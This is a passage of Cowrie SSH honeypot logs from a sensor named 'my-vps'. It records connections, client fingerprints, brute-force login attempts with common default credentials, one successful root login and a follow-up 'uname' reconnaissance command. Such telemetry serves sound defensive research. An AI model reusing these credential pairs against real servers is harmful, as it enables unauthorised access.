group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:37:17.200825Z","src_ip":"212.227.235.229","session":"695e969608d1"}
{"eventid":"cowrie.login.failed","username":"es","password":"admin123","message":"login attempt [es/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:37:23.176200Z","src_ip":"212.227.235.229","session":"695e969608d1"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:24.969487Z","src_ip":"212.227.235.229","session":"695e969608d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38544,"dst_ip":"1.2.3.4","dst_port":22,"session":"c220844ed0fd","protocol":"ssh","message":"New connection: 212.227.235.229:38544 (1.2.3.4:22) [session: c220844ed0fd]","sensor":"my-vps","timestamp":"2025-08-31T02:37:30.108519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:30.109195Z","src_ip":"212.227.235.229","session":"c220844ed0fd"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T02:37:30.316642Z","src_ip":"212.227.235.229","session":"c220844ed0fd"}
{"eventid":"cowrie.login.failed","username":"deployuser","password":"123456789","message":"login attempt [deployuser/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:37:30.939094Z","src_ip":"212.227.235.229","session":"c220844ed0fd"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:32.146532Z","src_ip":"212.227.235.229","session":"c220844ed0fd"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59330,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddfbc6104c5a","protocol":"ssh","message":"New connection: 41.226.27.251:59330 (1.2.3.4:22) [session: ddfbc6104c5a]","sensor":"my-vps","timestamp":"2025-08-31T02:37:35.646394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:35.647244Z","src_ip":"41.226.27.251","session":"ddfbc6104c5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:37:35.690825Z","src_ip":"41.226.27.251","session":"ddfbc6104c5a"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-31T02:37:35.823180Z","src_ip":"41.226.27.251","session":"ddfbc6104c5a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:37.121773Z","src_ip":"41.226.27.251","session":"ddfbc6104c5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40390,"dst_ip":"1.2.3.4","dst_port":22,"session":"47a4c6236ebe","protocol":"ssh","message":"New connection: 212.227.125.160:40390 (1.2.3.4:22) [session: 47a4c6236ebe]","sensor":"my-vps","timestamp":"2025-08-31T02:37:38.425093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:38.876329Z","src_ip":"212.227.125.160","session":"47a4c6236ebe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:37:38.877907Z","src_ip":"212.227.125.160","session":"47a4c6236ebe"}
{"eventid":"cowrie.login.failed","username":"es","password":"admin123","message":"login attempt [es/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:37:41.102999Z","src_ip":"212.227.125.160","session":"47a4c6236ebe"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:42.508889Z","src_ip":"212.227.125.160","session":"47a4c6236ebe"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51304,"dst_ip":"1.2.3.4","dst_port":22,"session":"a55406ecd9ef","protocol":"ssh","message":"New connection: 41.226.27.251:51304 (1.2.3.4:22) [session: a55406ecd9ef]","sensor":"my-vps","timestamp":"2025-08-31T02:37:55.651342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:55.652306Z","src_ip":"41.226.27.251","session":"a55406ecd9ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:37:55.696942Z","src_ip":"41.226.27.251","session":"a55406ecd9ef"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-31T02:37:55.834362Z","src_ip":"41.226.27.251","session":"a55406ecd9ef"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:57.040339Z","src_ip":"41.226.27.251","session":"a55406ecd9ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44688,"dst_ip":"1.2.3.4","dst_port":22,"session":"01659f9d678e","protocol":"ssh","message":"New connection: 212.227.125.160:44688 (1.2.3.4:22) [session: 01659f9d678e]","sensor":"my-vps","timestamp":"2025-08-31T02:37:59.402756Z"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:37:59.487628Z","src_ip":"212.227.235.229","session":"861b81945cf6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:15.979928Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:38:15.981222Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38668,"dst_ip":"1.2.3.4","dst_port":22,"session":"959f294f2dd1","protocol":"ssh","message":"New connection: 41.226.27.251:38668 (1.2.3.4:22) [session: 959f294f2dd1]","sensor":"my-vps","timestamp":"2025-08-31T02:38:16.192173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:16.193588Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:38:16.236552Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:38:16.411130Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:38:16.979320Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:38:16.980089Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.session.closed","duration":"68.3","message":"Connection lost after 68.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:16.982346Z","src_ip":"212.227.235.229","session":"861b81945cf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:17.025822Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:17.027015Z","src_ip":"41.226.27.251","session":"959f294f2dd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58754,"dst_ip":"1.2.3.4","dst_port":22,"session":"db1ee5da175c","protocol":"ssh","message":"New connection: 212.227.235.229:58754 (1.2.3.4:22) [session: db1ee5da175c]","sensor":"my-vps","timestamp":"2025-08-31T02:38:17.745981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:18.496730Z","src_ip":"212.227.235.229","session":"db1ee5da175c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:38:18.498192Z","src_ip":"212.227.235.229","session":"db1ee5da175c"}
{"eventid":"cowrie.login.failed","username":"es","password":"root123","message":"login attempt [es/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:38:23.727335Z","src_ip":"212.227.235.229","session":"db1ee5da175c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:24.533149Z","src_ip":"116.198.230.226","session":"cf6c4007c68b"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:25.524427Z","src_ip":"212.227.235.229","session":"db1ee5da175c"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49068,"dst_ip":"1.2.3.4","dst_port":22,"session":"450833caccdd","protocol":"ssh","message":"New connection: 41.226.27.251:49068 (1.2.3.4:22) [session: 450833caccdd]","sensor":"my-vps","timestamp":"2025-08-31T02:38:36.523444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:36.524655Z","src_ip":"41.226.27.251","session":"450833caccdd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:38:36.572652Z","src_ip":"41.226.27.251","session":"450833caccdd"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-31T02:38:36.718920Z","src_ip":"41.226.27.251","session":"450833caccdd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:37.920382Z","src_ip":"41.226.27.251","session":"450833caccdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48928,"dst_ip":"1.2.3.4","dst_port":22,"session":"2207b0b3c712","protocol":"ssh","message":"New connection: 212.227.125.160:48928 (1.2.3.4:22) [session: 2207b0b3c712]","sensor":"my-vps","timestamp":"2025-08-31T02:38:38.799104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:39.406083Z","src_ip":"212.227.125.160","session":"2207b0b3c712"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:38:39.406814Z","src_ip":"212.227.125.160","session":"2207b0b3c712"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53832,"dst_ip":"1.2.3.4","dst_port":22,"session":"f48ec5f68d2a","protocol":"ssh","message":"New connection: 212.227.235.229:53832 (1.2.3.4:22) [session: f48ec5f68d2a]","sensor":"my-vps","timestamp":"2025-08-31T02:38:41.573217Z"}
{"eventid":"cowrie.login.failed","username":"es","password":"root123","message":"login attempt [es/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:38:41.843472Z","src_ip":"212.227.125.160","session":"2207b0b3c712"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:38:43.317290Z","src_ip":"212.227.125.160","session":"2207b0b3c712"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:38:55.955011Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
